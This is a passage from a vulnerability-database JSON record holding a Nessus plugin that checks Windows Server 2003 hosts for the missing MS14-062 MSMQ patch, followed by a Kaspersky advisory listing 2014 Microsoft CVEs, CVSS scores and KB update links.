script_bugtraq_id(68764);\n script_xref(name:\"EDB-ID\", value:\"34982\");\n script_xref(name:\"MSFT\", value:\"MS14-062\");\n script_xref(name:\"MSKB\", value:\"2993254\");\n script_xref(name:\"IAVA\", value:\"2014-A-0150\");\n\n script_name(english:\"MS14-062: Vulnerability in Message Queuing Service Could Allow Elevation of Privilege (2993254)\");\n script_summary(english:\"Checks presence of MSMQ service / version of Mqqm.dll.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by a privilege escalation\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is affected by a privilege escalation\nvulnerability in the Microsoft Message Queuing (MSMQ) service. 
The\nvulnerability can be exploited if an attacker sends a specially\ncrafted input/output control (IOCTL) request to the Message Queuing\nservice. Successful exploitation of this vulnerability could lead to\nfull access to the affected system.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2014/ms14-062\");\n script_set_attribute(attribute:\"solution\", value:\"Microsoft has released a set of patches for Windows 2003.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MQAC.sys Arbitrary Write Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/10/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"II\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"smb_enum_services.nasl\", 
\"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS14-062';\nkb = \"2993254\";\n\nkbs = make_list(kb);\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win2003:'2') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n # Windows Server 2003\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Mqqm.dll\", version:\"5.2.2008.5417\", dir:\"\\system32\", bulletin:bulletin, kb:kb)\n)\n{\n set_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "kaspersky": [{"lastseen": "2020-09-02T12:03:35", "bulletinFamily": "info", "cvelist": ["CVE-2014-1814", "CVE-2014-4077", "CVE-2014-6324", "CVE-2014-0254", "CVE-2014-0323", "CVE-2014-1811", "CVE-2014-0266", "CVE-2014-1807", "CVE-2014-6332", "CVE-2014-6322", "CVE-2014-4971", "CVE-2014-0255", "CVE-2014-0296", "CVE-2014-0300", "CVE-2014-0317", "CVE-2014-1767", "CVE-2014-6355", "CVE-2014-4114", "CVE-2014-0316", "CVE-2014-1819", "CVE-2014-4076", "CVE-2014-0318", "CVE-2014-4113", "CVE-2014-6318", "CVE-2014-6532", "CVE-2014-2781", "CVE-2014-0315", "CVE-2014-2780", "CVE-2014-4148", "CVE-2014-1816", "CVE-2014-6352", 
"CVE-2014-4064", "CVE-2013-5065", "CVE-2014-1824", "CVE-2014-1812", "CVE-2014-0262", "CVE-2014-4115", "CVE-2014-0263", "CVE-2014-4060", "CVE-2014-4118", "CVE-2014-6317", "CVE-2014-0301", "CVE-2014-4074", "CVE-2014-6321", "CVE-2014-0256"], "description": "### *Detect date*:\n11/11/2014\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple serious vulnerabilities have been found in Microsoft products. Malicious users can exploit these vulnerabilities to bypass security restrictions, cause denial of service gain privileges, execute arbitrary code or obtain sensitive information.\n\n### *Affected products*:\nWindows XP Service pack 3 \nWindows XP Professional x64 Service Pack 3 \nWindows Server 2003 x86, x64, Itanium Service Pack 2 \nWindows Vista x86, x64 Service Pack 2 \nWindows Server 2008 x86, x64, Itanium Service Pack 2 \nWindows 7 x86, x64 Service Pack 1 \nWindows Server 2008 R2 x64, Itanium Service Pacl 1 \nWindows 8 x86, x64 \nWindows 8.1 x86, x64 \nWindows Server 2012 \nWindows Server 2012 R2 \nWindows RT \nWindows RT 8.1\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2014-1816](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-1816>) \n[CVE-2014-6532](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-6532>) \n[CVE-2014-0266](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-0266>) \n[CVE-2014-4076](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-4076>) \n[CVE-2014-6321](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-6321>) \n[CVE-2014-6322](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-6322>) \n[CVE-2014-6324](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-6324>) 
\n[CVE-2014-1767](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-1767>) \n[CVE-2014-4077](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-4077>) \n[CVE-2014-4074](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-4074>) \n[CVE-2014-1807](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-1807>) \n[CVE-2013-5065](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2013-5065>) \n[CVE-2014-0300](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-0300>) \n[CVE-2014-0323](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-0323>) \n[CVE-2014-4971](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-4971>) \n[CVE-2014-0301](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-0301>) \n[CVE-2014-0262](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-0262>) \n[CVE-2014-0263](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-0263>) \n[CVE-2014-4115](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-4115>) \n[CVE-2014-4113](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-4113>) \n[CVE-2014-0315](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-0315>) \n[CVE-2014-0316](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-0316>) \n[CVE-2014-0317](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-0317>) \n[CVE-2014-0255](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-0255>) \n[CVE-2014-0318](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-0318>) \n[CVE-2014-4118](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-4118>) 
\n[CVE-2014-6352](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-6352>) \n[CVE-2014-6332](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-6332>) \n[CVE-2014-0296](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-0296>) \n[CVE-2014-0256](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-0256>) \n[CVE-2014-1811](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-1811>) \n[CVE-2014-0254](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-0254>) \n[CVE-2014-1819](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-1819>) \n[CVE-2014-6355](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-6355>) \n[CVE-2014-2780](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-2780>) \n[CVE-2014-2781](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-2781>) \n[CVE-2014-1812](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-1812>) \n[CVE-2014-4064](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-4064>) \n[CVE-2014-6318](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-6318>) \n[CVE-2014-1814](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-1814>) \n[CVE-2014-4060](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-4060>) \n[CVE-2014-1824](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-1824>) \n[CVE-2014-6317](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-6317>) \n[CVE-2014-4114](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-4114>) \n[CVE-2014-4148](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-4148>) \n\n\n### *Impacts*:\nACE \n\n### *Related 
products*:\n[Microsoft Windows Vista](<https://threats.kaspersky.com/en/product/Microsoft-Windows-Vista-4/>)\n\n### *CVE-IDS*:\n[CVE-2014-1816](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1816>)4.3Warning \n[CVE-2014-6532](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6532>)9.3Critical \n[CVE-2014-0266](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0266>)7.1High \n[CVE-2014-4076](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4076>)7.2High \n[CVE-2014-6321](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6321>)10.0Critical \n[CVE-2014-6322](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6322>)4.3Warning \n[CVE-2014-6324](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6324>)9.0Critical \n[CVE-2014-1767](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1767>)7.2High \n[CVE-2014-4077](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4077>)9.3Critical \n[CVE-2014-4074](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4074>)6.8High \n[CVE-2014-1807](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1807>)7.2High \n[CVE-2013-5065](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5065>)7.2High \n[CVE-2014-0300](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0300>)7.2High \n[CVE-2014-0323](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0323>)6.6High \n[CVE-2014-4971](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4971>)7.2High \n[CVE-2014-0301](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0301>)9.3Critical \n[CVE-2014-0262](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0262>)7.2High \n[CVE-2014-0263](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0263>)9.3Critical \n[CVE-2014-4115](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4115>)7.2High \n[CVE-2014-4113](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4113>)7.2High 
\n[CVE-2014-0315](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0315>)6.9High \n[CVE-2014-0316](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0316>)7.5Critical \n[CVE-2014-0317](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0317>)5.4High \n[CVE-2014-0255](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0255>)5.0Critical \n[CVE-2014-0318](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0318>)7.2High \n[CVE-2014-4118](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4118>)9.3Critical \n[CVE-2014-6352](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6352>)9.3Critical \n[CVE-2014-6332](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6332>)9.3Critical \n[CVE-2014-0296](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0296>)5.1High \n[CVE-2014-0256](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0256>)5.0Critical \n[CVE-2014-1811](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1811>)5.0Critical \n[CVE-2014-0254](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0254>)7.8Critical \n[CVE-2014-1819](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1819>)7.2High \n[CVE-2014-6355](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6355>)5.0Critical \n[CVE-2014-2780](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2780>)6.9High \n[CVE-2014-2781](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2781>)7.6Critical \n[CVE-2014-1812](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1812>)6.8High \n[CVE-2014-4064](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4064>)4.9Warning \n[CVE-2014-6318](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6318>)5.0Critical \n[CVE-2014-1814](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1814>)7.2High \n[CVE-2014-4060](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4060>)6.8High 
\n[CVE-2014-1824](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1824>)9.3Critical \n[CVE-2014-6317](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6317>)7.1High \n[CVE-2014-4114](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4114>)9.3Critical \n[CVE-2014-4148](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4148>)9.3Critical\n\n### *Microsoft official advisories*:\n\n\n### *KB list*:\n[2966631](<http://support.microsoft.com/kb/2966631>) \n[2957482](<http://support.microsoft.com/kb/2957482>) \n[2966061](<http://support.microsoft.com/kb/2966061>) \n[2939576](<http://support.microsoft.com/kb/2939576>) \n[2922229](<http://support.microsoft.com/kb/2922229>) \n[2973201](<http://support.microsoft.com/kb/2973201>) \n[2975689](<http://support.microsoft.com/kb/2975689>) \n[2957189](<http://support.microsoft.com/kb/2957189>) \n[3013126](<http://support.microsoft.com/kb/3013126>) \n[2969259](<http://support.microsoft.com/kb/2969259>) \n[2929961](<http://support.microsoft.com/kb/2929961>) \n[3010788](<http://support.microsoft.com/kb/3010788>) \n[2984615](<http://support.microsoft.com/kb/2984615>) \n[2914368](<http://support.microsoft.com/kb/2914368>) \n[3003743](<http://support.microsoft.com/kb/3003743>) \n[3002885](<http://support.microsoft.com/kb/3002885>) \n[2904659](<http://support.microsoft.com/kb/2904659>) \n[2961858](<http://support.microsoft.com/kb/2961858>) \n[3005607](<http://support.microsoft.com/kb/3005607>) \n[2962490](<http://support.microsoft.com/kb/2962490>) \n[2592687](<http://support.microsoft.com/kb/2592687>) \n[2966034](<http://support.microsoft.com/kb/2966034>) \n[2993958](<http://support.microsoft.com/kb/2993958>) \n[2988948](<http://support.microsoft.com/kb/2988948>) \n[2961072](<http://support.microsoft.com/kb/2961072>) \n[2926765](<http://support.microsoft.com/kb/2926765>) \n[2973932](<http://support.microsoft.com/kb/2973932>) \n[2962123](<http://support.microsoft.com/kb/2962123>) 
\n[2998579](<http://support.microsoft.com/kb/2998579>) \n[2989935](<http://support.microsoft.com/kb/2989935>) \n[2973906](<http://support.microsoft.com/kb/2973906>) \n[2961899](<http://support.microsoft.com/kb/2961899>) \n[2933826](<http://support.microsoft.com/kb/2933826>) \n[2962478](<http://support.microsoft.com/kb/2962478>) \n[2975685](<http://support.microsoft.com/kb/2975685>) \n[2975684](<http://support.microsoft.com/kb/2975684>) \n[2916036](<http://support.microsoft.com/kb/2916036>) \n[2975681](<http://support.microsoft.com/kb/2975681>) \n[2978742](<http://support.microsoft.com/kb/2978742>) \n[2933528](<http://support.microsoft.com/kb/2933528>) \n[2934418](<http://support.microsoft.com/kb/2934418>) \n[2993254](<http://support.microsoft.com/kb/2993254>) \n[2978668](<http://support.microsoft.com/kb/2978668>) \n[2974286](<http://support.microsoft.com/kb/2974286>) \n[2928120](<http://support.microsoft.com/kb/2928120>) \n[2991963](<http://support.microsoft.com/kb/2991963>) \n[2992611](<http://support.microsoft.com/kb/2992611>) \n[3000869](<http://support.microsoft.com/kb/3000869>) \n[3011443](<http://support.microsoft.com/kb/3011443>) \n[2923392](<http://support.microsoft.com/kb/2923392>) \n[2962488](<http://support.microsoft.com/kb/2962488>) \n[2918614](<http://support.microsoft.com/kb/2918614>) \n[2962485](<http://support.microsoft.com/kb/2962485>) \n[2889913](<http://support.microsoft.com/kb/2889913>) \n[2912390](<http://support.microsoft.com/kb/2912390>) \n[2962486](<http://support.microsoft.com/kb/2962486>) \n[2930275](<http://support.microsoft.com/kb/2930275>) \n[2919355](<http://support.microsoft.com/kb/2919355>) \n[2965788](<http://support.microsoft.com/kb/2965788>) \n[2972280](<http://support.microsoft.com/kb/2972280>) \n[2962073](<http://support.microsoft.com/kb/2962073>) \n[2971850](<http://support.microsoft.com/kb/2971850>) \n[2992719](<http://support.microsoft.com/kb/2992719>) \n[2993651](<http://support.microsoft.com/kb/2993651>) 
\n[3000061](<http://support.microsoft.com/kb/3000061>) \n[2913602](<http://support.microsoft.com/kb/2913602>) \n[2976897](<http://support.microsoft.com/kb/2976897>) \n[2973408](<http://support.microsoft.com/kb/2973408>) \n[3006226](<http://support.microsoft.com/kb/3006226>) \n[3011780](<http://support.microsoft.com/kb/3011780>)\n\n### *Exploitation*:\nThe following public exploits exist for this vulnerability:", "edition": 41, "modified": "2020-06-18T00:00:00", "published": "2014-11-11T00:00:00", "id": "KLA10601", "href": "https://threats.kaspersky.com/en/vulnerability/KLA10601", "title": "\r KLA10601Multiple vulnerabilities in Microsoft products ", "type": "kaspersky", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}